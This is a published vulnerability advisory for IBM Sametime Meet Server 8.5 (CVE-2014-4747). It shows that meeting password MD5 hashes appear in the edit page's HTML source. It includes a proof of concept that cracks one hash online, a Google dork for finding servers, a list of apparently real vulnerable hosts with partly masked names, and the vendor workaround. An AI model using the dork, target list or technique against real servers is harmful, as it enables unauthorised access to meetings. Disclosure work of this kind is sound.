# Exploit Title: IBM Sametime Meet Server 8.5 Password Disclosure # Google Dork: intitle:"Meeting Center - IBM Lotus Sametime" # Date: 11/08/2014 # CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N # CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747 # OSVDB-ID: http://osvdb.org/109443 # # Author: Adriano Marcio Monteiro # E-mail: adrianomarciomonteiro@gmail.com # Blog: http://www.brazucasecurity.com.br # # Vendor: http://www.ibm.com # Software: http://www.ibm.com/sametime # Version: 8.5.1 # Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221 # # Test Type: Black Box # Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Vers&#227;o 33.0.1750.146 m Table of Contents [0x00] The Vulnerability [0x01] Exploit Description [0x02] PoC - Proof of Concept [0x03] Correction or Workaround [0x04] Timeline [0x05] Published [0x06] References [0x07] Bibliography [0x00] The Vulnerabilty Password Disclosure Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function. [0x01] Exploit Description On the page that allows editing a meeting is possible to retrieve the MD5 hash of the password of the meeting just by reading the HTML source code of the page. [0x02] PoC - Proof of Concept For exploit this vulnerability you only need to analyze the source code of page. http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536 [...] <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw"> <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw"> [...] http://www.md5online.org E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA Examples: http://sametime.elXtrosul.gov.br/stconf.nsf/frmConference?OpenForm http://sametime.Xsp.gov.br/stconf.nsf/frmConference?OpenForm http://sametime.gXrude.ufmg.br/stconf.nsf/frmConference?OpenForm http://sametime.sXchahin.com.br/stconf.nsf/frmConference?OpenForm http://sametime.cX-pack.com.br/stconf.nsf/frmConference?OpenForm http://www.azi.cXom.br/stconf.nsf/frmConference?OpenForm http://aquila.seaXlinc.org/stconf.nsf/frmConference?Openform http://noteschat.soXla.kommune.no/stconf.nsf/frmConference?Openform http://comware.Xnet/stconf.nsf/frmConference?Openform https://236ws.dXpteruel.es/stconf.nsf/frmConference?OpenForm https://correowXeb.gruposanjose.biz/stconf.nsf/frmConference?Openform http://noteschaXt.sola.kommune.no/stconf.nsf/frmConference?Openform https://mail.dba.Xuz/stconf.nsf/frmConference?Openform [0x03] Correction or Workaround Apply the procedures described in the follow link: http://www-01.ibm.com/support/docview.wss?uid=swg21679454 [0x04] Timeline 18/07/2014 - Vulnerabilities discovered 19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team 23/07/2014 - Advisory and troubleshooting fix published [0x05] Published http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747 http://www.securityfocus.com/bid/68823 [0x06] References Information Leakage https://www.owasp.org/index.php/Information_Leakage CWE-200: Information Exposure http://cwe.mitre.org/data/definitions/200.html [0x07] Bibliography http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent [end]